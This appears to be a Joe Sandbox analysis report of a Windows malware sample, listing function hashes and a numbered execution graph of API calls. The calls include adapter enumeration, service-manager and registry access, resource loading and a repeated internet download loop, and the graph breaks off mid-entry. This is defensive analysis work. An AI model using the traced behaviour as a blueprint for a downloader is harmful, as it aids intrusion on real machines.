                                                                                    • Part of subcall function 0046CF08: GetLastError.KERNEL32(00000000,0046CFF4,?,?,?,0048F01C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0046D07B,00000001), ref: 0046CF29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$DeleteErrorLastMove
                                                                                  • String ID: DeleteFile$MoveFile
                                                                                  • API String ID: 3195829115-139070271
                                                                                  • Opcode ID: 1fb7fa96760e473de8275900c15629c0814175ee13bcff20137844867843fc14
                                                                                  • Instruction ID: 0290939a9a17b91d35f09eeda710208ebb9d055fac8272bf6124b28975ff00c6
                                                                                  • Opcode Fuzzy Hash: 1fb7fa96760e473de8275900c15629c0814175ee13bcff20137844867843fc14
                                                                                  • Instruction Fuzzy Hash: 9BF06860F006509BDE10BB69848165A339D4F0135CF14403BBA80BB2C3EA3E9C47C7AF
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 1458359878-0
                                                                                  • Opcode ID: c4143a2ee8335f4b5f9cae01fd799b1db307f4040e09921811ea96fb0a15e640
                                                                                  • Instruction ID: 43fe1f040fa7402c2e45a0ba9766c6d0b80e794a4748146ae4c345008815f9b0
                                                                                  • Opcode Fuzzy Hash: c4143a2ee8335f4b5f9cae01fd799b1db307f4040e09921811ea96fb0a15e640
                                                                                  • Instruction Fuzzy Hash: 67F09673A06614978B20AD9E888596FA28CDA517A7710412BFC05DB303D938CE058AA9

                                                                                  Execution Graph

                                                                                  Execution Coverage:9.6%
                                                                                  Dynamic/Decrypted Code Coverage:83.7%
                                                                                  Signature Coverage:4%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:34
                                                                                  execution_graph 17371 402d60 GetVersion 17395 4039f0 HeapCreate 17371->17395 17373 402dbf 17374 402dc4 17373->17374 17375 402dcc 17373->17375 17470 402e7b 17374->17470 17407 4036d0 17375->17407 17379 402dd4 GetCommandLineA 17421 40359e 17379->17421 17383 402dee 17453 403298 17383->17453 17385 402df3 17386 402df8 GetStartupInfoA 17385->17386 17466 403240 17386->17466 17388 402e0a GetModuleHandleA 17390 402e2e 17388->17390 17476 402fe7 17390->17476 17396 403a10 17395->17396 17397 403a46 17395->17397 17483 4038a8 17396->17483 17397->17373 17400 403a2c 17403 403a49 17400->17403 17497 404618 17400->17497 17401 403a1f 17495 403dc7 HeapAlloc 17401->17495 17403->17373 17404 403a29 17404->17403 17406 403a3a HeapDestroy 17404->17406 17406->17397 17560 402e9f 17407->17560 17410 4036ef GetStartupInfoA 17413 403800 17410->17413 17414 40373b 17410->17414 17415 403867 SetHandleCount 17413->17415 17416 403827 GetStdHandle 17413->17416 17414->17413 17417 402e9f 12 API calls 17414->17417 17420 4037ac 17414->17420 17415->17379 17416->17413 17418 403835 GetFileType 17416->17418 17417->17414 17418->17413 17419 4037ce GetFileType 17419->17420 17420->17413 17420->17419 17422 4035b9 GetEnvironmentStringsW 17421->17422 17423 4035ec 17421->17423 17424 4035c1 17422->17424 17425 4035cd GetEnvironmentStrings 17422->17425 17423->17424 17426 4035dd 17423->17426 17428 403605 WideCharToMultiByte 17424->17428 17429 4035f9 GetEnvironmentStringsW 17424->17429 17425->17426 17427 402de4 17425->17427 17426->17427 17430 40368b 17426->17430 17431 40367f GetEnvironmentStrings 17426->17431 17444 403351 17427->17444 17433 403639 17428->17433 17434 40366b FreeEnvironmentStringsW 17428->17434 17429->17427 17429->17428 17435 402e9f 12 API calls 17430->17435 17431->17427 17431->17430 17436 402e9f 12 API calls 17433->17436 17434->17427 17441 4036a6 17435->17441 17437 40363f 17436->17437 17437->17434 17438 403648 WideCharToMultiByte 17437->17438 17440 403659 17438->17440 17443 403662 17438->17443 17439 4036bc FreeEnvironmentStringsA 17439->17427 17626 402f51 17440->17626 17441->17439 17443->17434 17445 403363 17444->17445 17446 403368 GetModuleFileNameA 17444->17446 17656 405042 17445->17656 17448 40338b 17446->17448 17449 402e9f 12 API calls 17448->17449 17450 4033ac 17449->17450 17451 4033bc 17450->17451 17452 402e56 7 API calls 17450->17452 17451->17383 17452->17451 17454 4032a5 17453->17454 17456 4032aa 17453->17456 17455 405042 19 API calls 17454->17455 17455->17456 17457 402e9f 12 API calls 17456->17457 17458 4032d7 17457->17458 17459 402e56 7 API calls 17458->17459 17465 4032eb 17458->17465 17459->17465 17460 40332e 17461 402f51 7 API calls 17460->17461 17462 40333a 17461->17462 17462->17385 17463 402e9f 12 API calls 17463->17465 17464 402e56 7 API calls 17464->17465 17465->17460 17465->17463 17465->17464 17467 403249 17466->17467 17469 40324e 17466->17469 17468 405042 19 API calls 17467->17468 17468->17469 17469->17388 17471 402e84 17470->17471 17472 402e89 17470->17472 17473 403c20 7 API calls 17471->17473 17474 403c59 7 API calls 17472->17474 17473->17472 17475 402e92 ExitProcess 17474->17475 17680 403009 17476->17680 17479 4030bc 17480 4030c8 17479->17480 17481 4031f1 UnhandledExceptionFilter 17480->17481 17482 402e48 17480->17482 17481->17482 17506 402c40 17483->17506 17486 4038d1 17487 4038eb GetEnvironmentVariableA 17486->17487 17488 4038e3 17486->17488 17490 40390a 17487->17490 17494 4039c8 17487->17494 17488->17400 17488->17401 17491 40394f GetModuleFileNameA 17490->17491 17492 403947 17490->17492 17491->17492 17492->17494 17508 40505e 17492->17508 17494->17488 17511 40387b GetModuleHandleA 17494->17511 17496 403de3 17495->17496 17496->17404 17498 404625 17497->17498 17499 40462c HeapAlloc 17497->17499 17500 404649 VirtualAlloc 17498->17500 17499->17500 17505 404681 17499->17505 17501 404669 VirtualAlloc 17500->17501 17502 40473e 17500->17502 17503 404730 VirtualFree 17501->17503 17501->17505 17504 404746 HeapFree 17502->17504 17502->17505 17503->17502 17504->17505 17505->17404 17505->17505 17507 402c4c GetVersionExA 17506->17507 17507->17486 17507->17487 17513 405075 17508->17513 17512 403892 17511->17512 17512->17488 17515 40508d 17513->17515 17517 4050bd 17515->17517 17520 405d39 17515->17520 17516 405d39 6 API calls 17516->17517 17517->17516 17519 405071 17517->17519 17524 405c6d 17517->17524 17519->17494 17521 405d57 17520->17521 17523 405d4b 17520->17523 17530 405b24 17521->17530 17523->17515 17525 405c98 17524->17525 17528 405c7b 17524->17528 17526 405cb4 17525->17526 17527 405d39 6 API calls 17525->17527 17526->17528 17542 4058d5 17526->17542 17527->17526 17528->17517 17531 405b6d 17530->17531 17532 405b55 GetStringTypeW 17530->17532 17534 405b98 GetStringTypeA 17531->17534 17535 405bbc 17531->17535 17532->17531 17533 405b71 GetStringTypeA 17532->17533 17533->17531 17536 405c59 17533->17536 17534->17536 17535->17536 17538 405bd2 MultiByteToWideChar 17535->17538 17536->17523 17538->17536 17539 405bf6 17538->17539 17539->17536 17540 405c30 MultiByteToWideChar 17539->17540 17540->17536 17541 405c49 GetStringTypeW 17540->17541 17541->17536 17543 405905 LCMapStringW 17542->17543 17544 405921 17542->17544 17543->17544 17545 405929 LCMapStringA 17543->17545 17546 405987 17544->17546 17547 40596a LCMapStringA 17544->17547 17545->17544 17555 405a63 17545->17555 17548 40599d MultiByteToWideChar 17546->17548 17546->17555 17547->17555 17549 4059c7 17548->17549 17548->17555 17550 4059fd MultiByteToWideChar 17549->17550 17549->17555 17551 405a16 LCMapStringW 17550->17551 17550->17555 17552 405a31 17551->17552 17551->17555 17553 405a37 17552->17553 17554 405a77 17552->17554 17553->17555 17556 405a45 LCMapStringW 17553->17556 17554->17555 17557 405aaf LCMapStringW 17554->17557 17555->17528 17556->17555 17557->17555 17558 405ac7 WideCharToMultiByte 17557->17558 17558->17555 17569 402eb1 17560->17569 17563 402e56 17564 402e64 17563->17564 17565 402e5f 17563->17565 17612 403c59 17564->17612 17606 403c20 17565->17606 17570 402eae 17569->17570 17572 402eb8 17569->17572 17570->17410 17570->17563 17572->17570 17573 402edd 17572->17573 17574 402eec 17573->17574 17577 402f01 17573->17577 17581 402efa 17574->17581 17582 404163 17574->17582 17576 402f40 HeapAlloc 17578 402f4f 17576->17578 17577->17576 17577->17581 17588 404910 17577->17588 17578->17572 17579 402eff 17579->17572 17581->17576 17581->17578 17581->17579 17583 404195 17582->17583 17584 404234 17583->17584 17586 404243 17583->17586 17595 40446c 17583->17595 17584->17586 17602 40451d 17584->17602 17586->17581 17589 40491e 17588->17589 17590 404adf 17589->17590 17592 404a0a VirtualAlloc 17589->17592 17594 4049db 17589->17594 17591 404618 5 API calls 17590->17591 17591->17594 17592->17594 17594->17581 17596 4044af HeapAlloc 17595->17596 17597 40447f HeapReAlloc 17595->17597 17599 4044ff 17596->17599 17600 4044d5 VirtualAlloc 17596->17600 17598 40449e 17597->17598 17597->17599 17598->17596 17599->17584 17600->17599 17601 4044ef HeapFree 17600->17601 17601->17599 17603 40452f VirtualAlloc 17602->17603 17605 404578 17603->17605 17605->17586 17607 403c2a 17606->17607 17608 403c59 7 API calls 17607->17608 17611 403c57 17607->17611 17609 403c41 17608->17609 17610 403c59 7 API calls 17609->17610 17610->17611 17611->17564 17614 403c6c 17612->17614 17613 403d83 17617 403d96 GetStdHandle WriteFile 17613->17617 17614->17613 17615 403cac 17614->17615 17620 402e6d 17614->17620 17616 403cb8 GetModuleFileNameA 17615->17616 17615->17620 17618 403cd0 17616->17618 17617->17620 17621 405408 17618->17621 17620->17410 17622 405415 LoadLibraryA 17621->17622 17625 405457 17621->17625 17623 405426 GetProcAddress 17622->17623 17622->17625 17624 40543d GetProcAddress GetProcAddress 17623->17624 17623->17625 17624->17625 17625->17620 17627 402f5d 17626->17627 17635 402f79 17626->17635 17628 402f67 17627->17628 17629 402f7d 17627->17629 17631 402fa9 HeapFree 17628->17631 17632 402f73 17628->17632 17630 402fa8 17629->17630 17634 402f97 17629->17634 17630->17631 17631->17635 17637 403e3a 17632->17637 17643 4048cb 17634->17643 17635->17443 17638 403e78 17637->17638 17642 40412e 17637->17642 17639 404074 VirtualFree 17638->17639 17638->17642 17640 4040d8 17639->17640 17641 4040e7 VirtualFree HeapFree 17640->17641 17640->17642 17641->17642 17642->17635 17644 4048f8 17643->17644 17645 40490e 17643->17645 17644->17645 17647 4047b2 17644->17647 17645->17635 17650 4047bf 17647->17650 17648 40486f 17648->17645 17649 4047e0 VirtualFree 17649->17650 17650->17648 17650->17649 17652 40475c VirtualFree 17650->17652 17653 404779 17652->17653 17654 4047a9 17653->17654 17655 404789 HeapFree 17653->17655 17654->17650 17655->17650 17657 40504b 17656->17657 17658 405052 17656->17658 17660 404c7e 17657->17660 17658->17446 17667 404e17 17660->17667 17662 404e0b 17662->17658 17665 404cc1 GetCPInfo 17666 404cd5 17665->17666 17666->17662 17672 404ebd GetCPInfo 17666->17672 17668 404e37 17667->17668 17669 404e27 GetOEMCP 17667->17669 17670 404c8f 17668->17670 17671 404e3c GetACP 17668->17671 17669->17668 17670->17662 17670->17665 17670->17666 17671->17670 17675 404ee0 17672->17675 17679 404fa8 17672->17679 17673 405b24 6 API calls 17674 404f5c 17673->17674 17676 4058d5 9 API calls 17674->17676 17675->17673 17677 404f80 17676->17677 17678 4058d5 9 API calls 17677->17678 17678->17679 17679->17662 17681 403015 GetCurrentProcess TerminateProcess 17680->17681 17682 403026 17680->17682 17681->17682 17683 402e37 17682->17683 17684 403090 ExitProcess 17682->17684 17683->17479 17685 2de01dc 17686 2e22582 Sleep 17685->17686 17687 2d9f8da LoadLibraryA 17688 2d9f9bd 17687->17688 17689 2d9f903 GetProcAddress 17687->17689 17690 2d9f917 17689->17690 17691 2d9f9b6 FreeLibrary 17689->17691 17692 2d9f929 GetAdaptersInfo 17690->17692 17693 2d9f9b1 17690->17693 17695 2da3a8f 17690->17695 17691->17688 17692->17690 17693->17691 17698 2da3a97 17695->17698 17697 2da3ab1 17697->17690 17698->17697 17700 2da3ab5 std::exception::exception 17698->17700 17703 2da2eec 17698->17703 17720 2da8143 RtlDecodePointer 17698->17720 17722 2da449a 17700->17722 17702 2da3adf 17704 2da2f67 17703->17704 17710 2da2ef8 17703->17710 17705 2da8143 _malloc RtlDecodePointer 17704->17705 17706 2da2f6d 17705->17706 17708 2da5d9b __setmbcp 58 API calls 17706->17708 17707 2da2f03 17707->17710 17725 2da8613 17707->17725 17734 2da8670 17707->17734 17769 2da825c 17707->17769 17712 2da2f5f 17708->17712 17710->17707 17711 2da2f2b RtlAllocateHeap 17710->17711 17714 2da2f53 17710->17714 17715 2da8143 _malloc RtlDecodePointer 17710->17715 17718 2da2f51 17710->17718 17711->17710 17711->17712 17712->17698 17772 2da5d9b 17714->17772 17715->17710 17719 2da5d9b __setmbcp 58 API calls 17718->17719 17719->17712 17721 2da8156 17720->17721 17721->17698 17723 2da44b9 RaiseException 17722->17723 17723->17702 17775 2db00be 17725->17775 17727 2da861a 17728 2db00be __FF_MSGBANNER 59 API calls 17727->17728 17733 2da8627 17727->17733 17728->17733 17729 2da8670 __NMSG_WRITE 59 API calls 17730 2da863f 17729->17730 17731 2da8670 __NMSG_WRITE 59 API calls 17730->17731 17732 2da8649 17731->17732 17732->17707 17733->17729 17733->17732 17735 2da868e __NMSG_WRITE 17734->17735 17736 2db00be __FF_MSGBANNER 55 API calls 17735->17736 17768 2da87b5 17735->17768 17738 2da86a1 17736->17738 17737 2da448b __cftoe_l 6 API calls 17739 2da881e 17737->17739 17740 2da87ba GetStdHandle 17738->17740 17741 2db00be __FF_MSGBANNER 55 API calls 17738->17741 17739->17707 17744 2da87c8 _strlen 17740->17744 17740->17768 17742 2da86b2 17741->17742 17742->17740 17743 2da86c4 17742->17743 17743->17768 17819 2daf47d 17743->17819 17746 2da8801 WriteFile 17744->17746 17744->17768 17746->17768 17748 2da8822 17750 2da4e45 __invoke_watson 8 API calls 17748->17750 17749 2da86f1 GetModuleFileNameW 17751 2da8711 17749->17751 17755 2da8721 __NMSG_WRITE 17749->17755 17753 2da882c 17750->17753 17752 2daf47d __NMSG_WRITE 55 API calls 17751->17752 17752->17755 17754 2da8851 RtlEnterCriticalSection 17753->17754 17871 2da88b5 17753->17871 17754->17707 17755->17748 17762 2da8767 17755->17762 17828 2daf4f2 17755->17828 17758 2da8844 17758->17754 17893 2da837f 17758->17893 17762->17748 17837 2daf411 17762->17837 17763 2daf411 __NMSG_WRITE 55 API calls 17765 2da879e 17763->17765 17765->17748 17766 2da87a5 17765->17766 17846 2db00fe RtlEncodePointer 17766->17846 17768->17737 17956 2da8228 GetModuleHandleExW 17769->17956 17959 2da5bb2 GetLastError 17772->17959 17774 2da5da0 17774->17718 17776 2db00c8 17775->17776 17777 2db00d2 17776->17777 17778 2da5d9b __setmbcp 59 API calls 17776->17778 17777->17727 17779 2db00ee 17778->17779 17782 2da4e35 17779->17782 17785 2da4e0a RtlDecodePointer 17782->17785 17786 2da4e1d 17785->17786 17791 2da4e45 IsProcessorFeaturePresent 17786->17791 17789 2da4e0a _vscan_fn 8 API calls 17790 2da4e41 17789->17790 17790->17727 17792 2da4e50 17791->17792 17797 2da4cd8 17792->17797 17796 2da4e34 17796->17789 17798 2da4cf2 ___raise_securityfailure __recalloc 17797->17798 17799 2da4d12 IsDebuggerPresent 17798->17799 17805 2da9468 SetUnhandledExceptionFilter UnhandledExceptionFilter 17799->17805 17802 2da4df9 17804 2da9453 GetCurrentProcess TerminateProcess 17802->17804 17803 2da4dd6 ___raise_securityfailure 17806 2da448b 17803->17806 17804->17796 17805->17803 17807 2da4493 17806->17807 17808 2da4495 IsProcessorFeaturePresent 17806->17808 17807->17802 17810 2da94cf 17808->17810 17813 2da947e IsDebuggerPresent 17810->17813 17814 2da9493 ___raise_securityfailure 17813->17814 17815 2da9468 ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 17814->17815 17816 2da949b ___raise_securityfailure 17815->17816 17817 2da9453 __invoke_watson GetCurrentProcess TerminateProcess 17816->17817 17818 2da94b8 17817->17818 17818->17802 17820 2daf496 17819->17820 17821 2daf488 17819->17821 17822 2da5d9b __setmbcp 59 API calls 17820->17822 17821->17820 17826 2daf4af 17821->17826 17823 2daf4a0 17822->17823 17824 2da4e35 _vscan_fn 9 API calls 17823->17824 17825 2da86e4 17824->17825 17825->17748 17825->17749 17826->17825 17827 2da5d9b __setmbcp 59 API calls 17826->17827 17827->17823 17832 2daf500 17828->17832 17829 2daf504 17830 2da5d9b __setmbcp 59 API calls 17829->17830 17831 2daf509 17829->17831 17836 2daf534 17830->17836 17831->17762 17832->17829 17832->17831 17834 2daf543 17832->17834 17833 2da4e35 _vscan_fn 9 API calls 17833->17831 17834->17831 17835 2da5d9b __setmbcp 59 API calls 17834->17835 17835->17836 17836->17833 17838 2daf42b 17837->17838 17841 2daf41d 17837->17841 17839 2da5d9b __setmbcp 59 API calls 17838->17839 17840 2daf435 17839->17840 17842 2da4e35 _vscan_fn 9 API calls 17840->17842 17841->17838 17844 2daf457 17841->17844 17843 2da8787 17842->17843 17843->17748 17843->17763 17844->17843 17845 2da5d9b __setmbcp 59 API calls 17844->17845 17845->17840 17847 2db0132 ___crtIsPackagedApp 17846->17847 17848 2db01f1 IsDebuggerPresent 17847->17848 17849 2db0141 LoadLibraryExW 17847->17849 17852 2db01fb 17848->17852 17853 2db0216 17848->17853 17850 2db0158 GetLastError 17849->17850 17851 2db017e GetProcAddress 17849->17851 17856 2db0167 LoadLibraryExW 17850->17856 17861 2db020e 17850->17861 17857 2db0192 7 API calls 17851->17857 17851->17861 17854 2db0209 17852->17854 17858 2db0202 OutputDebugStringW 17852->17858 17853->17854 17855 2db021b RtlDecodePointer 17853->17855 17854->17861 17862 2db0242 RtlDecodePointer RtlDecodePointer 17854->17862 17869 2db025a 17854->17869 17855->17861 17856->17851 17856->17861 17859 2db01da GetProcAddress RtlEncodePointer 17857->17859 17860 2db01ee 17857->17860 17858->17854 17859->17860 17860->17848 17865 2da448b __cftoe_l 6 API calls 17861->17865 17862->17869 17863 2db0292 RtlDecodePointer 17864 2db027e RtlDecodePointer 17863->17864 17866 2db0299 17863->17866 17864->17861 17867 2db02e0 17865->17867 17866->17864 17870 2db02aa RtlDecodePointer 17866->17870 17867->17768 17869->17863 17869->17864 17870->17864 17872 2da88c1 __setmbcp 17871->17872 17873 2da8613 __FF_MSGBANNER 59 API calls 17872->17873 17886 2da88e0 17872->17886 17875 2da88cf 17873->17875 17877 2da8670 __NMSG_WRITE 59 API calls 17875->17877 17881 2da88d6 17877->17881 17878 2da88fe 17882 2da5d9b __setmbcp 59 API calls 17878->17882 17879 2da890d 17905 2da882d 17879->17905 17880 2da8903 __setmbcp 17880->17758 17884 2da825c _malloc 3 API calls 17881->17884 17882->17880 17884->17886 17885 2da8914 17887 2da8939 17885->17887 17888 2da8921 17885->17888 17886->17880 17900 2da89f4 17886->17900 17915 2da2eb4 17887->17915 17912 2da914c 17888->17912 17891 2da892d 17921 2da8955 17891->17921 17894 2da8613 __FF_MSGBANNER 59 API calls 17893->17894 17895 2da8387 17894->17895 17896 2da8670 __NMSG_WRITE 59 API calls 17895->17896 17897 2da838f 17896->17897 17926 2da842e 17897->17926 17903 2da8a02 17900->17903 17901 2da2eec _malloc 59 API calls 17901->17903 17902 2da88f7 17902->17878 17902->17879 17903->17901 17903->17902 17924 2da9445 Sleep 17903->17924 17906 2da883e 17905->17906 17907 2da8851 RtlEnterCriticalSection 17905->17907 17908 2da88b5 __mtinitlocknum 58 API calls 17906->17908 17907->17885 17909 2da8844 17908->17909 17909->17907 17910 2da837f __amsg_exit 58 API calls 17909->17910 17911 2da8850 17910->17911 17911->17907 17913 2da9169 InitializeCriticalSectionAndSpinCount 17912->17913 17914 2da915c 17912->17914 17913->17891 17914->17891 17916 2da2ee6 __dosmaperr 17915->17916 17917 2da2ebd HeapFree 17915->17917 17916->17891 17917->17916 17918 2da2ed2 17917->17918 17919 2da5d9b __setmbcp 57 API calls 17918->17919 17920 2da2ed8 GetLastError 17919->17920 17920->17916 17925 2da8997 RtlLeaveCriticalSection 17921->17925 17923 2da895c 17923->17880 17924->17903 17925->17923 17929 2da84e4 17926->17929 17928 2da839a 17930 2da84f0 __setmbcp 17929->17930 17931 2da882d __lock 52 API calls 17930->17931 17932 2da84f7 17931->17932 17933 2da8525 RtlDecodePointer 17932->17933 17936 2da85b0 __cinit 17932->17936 17935 2da853c RtlDecodePointer 17933->17935 17933->17936 17942 2da854c 17935->17942 17949 2da85fe 17936->17949 17938 2da860d __setmbcp 17938->17928 17940 2da8559 RtlEncodePointer 17940->17942 17941 2da85f5 17943 2da825c _malloc 3 API calls 17941->17943 17942->17936 17942->17940 17944 2da8569 RtlDecodePointer RtlEncodePointer 17942->17944 17945 2da85fe 17943->17945 17947 2da857b RtlDecodePointer RtlDecodePointer 17944->17947 17946 2da860b 17945->17946 17954 2da8997 RtlLeaveCriticalSection 17945->17954 17946->17928 17947->17942 17950 2da85de 17949->17950 17951 2da8604 17949->17951 17950->17938 17953 2da8997 RtlLeaveCriticalSection 17950->17953 17955 2da8997 RtlLeaveCriticalSection 17951->17955 17953->17941 17954->17946 17955->17950 17957 2da8253 ExitProcess 17956->17957 17958 2da8241 GetProcAddress 17956->17958 17958->17957 17973 2da910b 17959->17973 17961 2da5bc7 17962 2da5c15 SetLastError 17961->17962 17976 2da89ac 17961->17976 17962->17774 17966 2da5bee 17967 2da5c0c 17966->17967 17968 2da5bf4 17966->17968 17970 2da2eb4 _free 56 API calls 17967->17970 17985 2da5c21 17968->17985 17972 2da5c12 17970->17972 17971 2da5bfc GetCurrentThreadId 17971->17962 17972->17962 17974 2da911e 17973->17974 17975 2da9122 TlsGetValue 17973->17975 17974->17961 17975->17961 17978 2da89b3 17976->17978 17979 2da5bda 17978->17979 17981 2da89d1 17978->17981 17995 2db03f8 17978->17995 17979->17962 17982 2da912a 17979->17982 17981->17978 17981->17979 18003 2da9445 Sleep 17981->18003 17983 2da9140 17982->17983 17984 2da9144 TlsSetValue 17982->17984 17983->17966 17984->17966 17986 2da5c2d __setmbcp 17985->17986 17987 2da882d __lock 59 API calls 17986->17987 17988 2da5c6a 17987->17988 18004 2da5cc2 17988->18004 17991 2da882d __lock 59 API calls 17992 2da5c8b ___addlocaleref 17991->17992 18007 2da5ccb 17992->18007 17994 2da5cb6 __setmbcp 17994->17971 17996 2db0403 17995->17996 18000 2db041e 17995->18000 17997 2db040f 17996->17997 17996->18000 17998 2da5d9b __setmbcp 58 API calls 17997->17998 18001 2db0414 17998->18001 17999 2db042e RtlAllocateHeap 17999->18000 17999->18001 18000->17999 18000->18001 18002 2da8143 _malloc RtlDecodePointer 18000->18002 18001->17978 18002->18000 18003->17981 18010 2da8997 RtlLeaveCriticalSection 18004->18010 18006 2da5c84 18006->17991 18011 2da8997 RtlLeaveCriticalSection 18007->18011 18009 2da5cd2 18009->17994 18010->18006 18011->18009 18012 402284 18013 40228a 18012->18013 18014 40b5e8 CreateDirectoryA 18013->18014 18014->18013 18015 40b1a7 18016 40b1b1 OpenSCManagerA 18015->18016 18017 40b5fe 18016->18017 18018 402609 lstrcmpiW 18019 402521 18018->18019 18021 40b4e5 18018->18021 18019->18018 18019->18021 18022 4024d3 18019->18022 18023 40b000 18022->18023 18024 40ba91 GetModuleHandleA 18023->18024 18025 4024eb RegCreateKeyExA 18026 402510 18025->18026 18027 40226c 18028 4027cf RegOpenKeyExA 18027->18028 18030 4021ce 18031 4025f0 18030->18031 18032 40b3de 18031->18032 18034 401f64 FindResourceA 18031->18034 18035 401f86 GetLastError SizeofResource 18034->18035 18041 401f9f 18034->18041 18036 401fa6 LoadResource LockResource GlobalAlloc 18035->18036 18035->18041 18037 401fd2 18036->18037 18038 401ffb GetTickCount 18037->18038 18039 402005 GlobalAlloc 18038->18039 18039->18041 18041->18032 18042 2de3b70 18043 2e1ddcc CloseHandle 18042->18043 18044 2e2ea7a 18043->18044 18045 2d9f7d6 CreateFileA 18046 2d9f8d2 18045->18046 18051 2d9f807 18045->18051 18047 2d9f81f DeviceIoControl 18047->18051 18048 2d9f8c8 CloseHandle 18048->18046 18049 2d9f894 GetLastError 18049->18048 18049->18051 18050 2da3a8f _Allocate 60 API calls 18050->18051 18051->18047 18051->18048 18051->18049 18051->18050 18052 2d9648b RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 18129 2d942c7 18052->18129 18130 2d972ab InternetOpenA 18131 2d972c9 InternetSetOptionA InternetSetOptionA InternetSetOptionA 18130->18131 18164 2d966f4 shared_ptr __recalloc 18130->18164 18137 2d97342 __recalloc 18131->18137 18132 2d97322 InternetOpenUrlA 18133 2d97382 InternetCloseHandle 18132->18133 18132->18137 18133->18164 18134 2d97346 InternetReadFile 18134->18137 18138 2d97377 InternetCloseHandle 18134->18138 18135 2d96708 Sleep 18136 2d9670e RtlEnterCriticalSection RtlLeaveCriticalSection 18135->18136 18136->18164 18137->18132 18137->18134 18138->18133 18139 2d973e9 RtlEnterCriticalSection RtlLeaveCriticalSection 18237 2da227c 18139->18237 18141 2da2eec _malloc 59 API calls 18142 2d9749d RtlEnterCriticalSection RtlLeaveCriticalSection 18141->18142 18142->18164 18143 2da227c 66 API calls 18143->18164 18144 2d9776a RtlEnterCriticalSection RtlLeaveCriticalSection 18144->18164 18145 2da2eec 59 API calls _malloc 18145->18164 18148 2d978e2 RtlEnterCriticalSection 18149 2d9790f RtlLeaveCriticalSection 18148->18149 18148->18164 18287 2d93c67 18149->18287 18150 2da2eb4 59 API calls _free 18150->18164 18156 2da3529 60 API calls _strtok 18156->18164 18157 2d9a658 73 API calls 18157->18164 18158 2da3a8f _Allocate 60 API calls 18158->18164 18164->18130 18164->18135 18164->18136 18164->18139 18164->18141 18164->18143 18164->18144 18164->18145 18164->18148 18164->18149 18164->18150 18164->18156 18164->18157 18164->18158 18164->18164 18168 2d976ec Sleep 18164->18168 18169 2d976e7 shared_ptr 18164->18169 18172 2d95119 18164->18172 18201 2d9ab42 18164->18201 18211 2d9826e 18164->18211 18217 2d9d04a 18164->18217 18222 2d9831d 18164->18222 18230 2d933b2 18164->18230 18247 2da2790 18164->18247 18250 2d9966a 18164->18250 18257 2d9a782 18164->18257 18265 2d94100 18164->18265 18269 2da2358 18164->18269 18278 2d91ba7 18164->18278 18294 2d93d7e 18164->18294 18301 2d98f36 18164->18301 18308 2d9534d 18164->18308 18261 2da1830 18168->18261 18169->18168 18173 2d95123 __EH_prolog 18172->18173 18318 2da0a50 18173->18318 18176 2d93c67 72 API calls 18177 2d9514a 18176->18177 18178 2d93d7e 64 API calls 18177->18178 18179 2d95158 18178->18179 18180 2d9826e 89 API calls 18179->18180 18181 2d9516c 18180->18181 18182 2d95322 shared_ptr 18181->18182 18322 2d9a658 18181->18322 18182->18164 18185 2d951c4 18187 2d9a658 73 API calls 18185->18187 18186 2d951f6 18188 2d9a658 73 API calls 18186->18188 18190 2d951d4 18187->18190 18189 2d95207 18188->18189 18189->18182 18191 2d9a658 73 API calls 18189->18191 18190->18182 18193 2d9a658 73 API calls 18190->18193 18192 2d9524a 18191->18192 18192->18182 18195 2d9a658 73 API calls 18192->18195 18194 2d952b4 18193->18194 18194->18182 18196 2d9a658 73 API calls 18194->18196 18195->18190 18197 2d952da 18196->18197 18197->18182 18198 2d9a658 73 API calls 18197->18198 18199 2d95304 18198->18199 18327 2d9ce0c 18199->18327 18202 2d9ab4c __EH_prolog 18201->18202 18444 2d9d021 18202->18444 18204 2d9ab6d shared_ptr 18447 2da2030 18204->18447 18206 2d9ab84 18207 2d9ab9a 18206->18207 18453 2d93fb0 18206->18453 18207->18164 18212 2d98286 18211->18212 18216 2d982a7 18211->18216 19195 2d99530 18212->19195 18215 2d982cc 18215->18164 18216->18215 19198 2d92ac7 18216->19198 18218 2da0a50 Mailbox 68 API calls 18217->18218 18220 2d9d060 18218->18220 18219 2d9d14e 18219->18164 18220->18219 18221 2d92db5 73 API calls 18220->18221 18221->18220 18223 2d98338 WSASetLastError shutdown 18222->18223 18224 2d98328 18222->18224 18226 2d9a43c 69 API calls 18223->18226 18225 2da0a50 Mailbox 68 API calls 18224->18225 18229 2d9832d 18225->18229 18227 2d98355 18226->18227 18228 2da0a50 Mailbox 68 API calls 18227->18228 18227->18229 18228->18229 18229->18164 18231 2d933e1 18230->18231 18232 2d933c4 InterlockedCompareExchange 18230->18232 18234 2d929ee 76 API calls 18231->18234 18232->18231 18233 2d933d6 18232->18233 19292 2d932ab 18233->19292 18236 2d933f1 18234->18236 18236->18164 18240 2da2288 18237->18240 18243 2da22ab 18237->18243 18239 2da228e 18242 2da5d9b __setmbcp 59 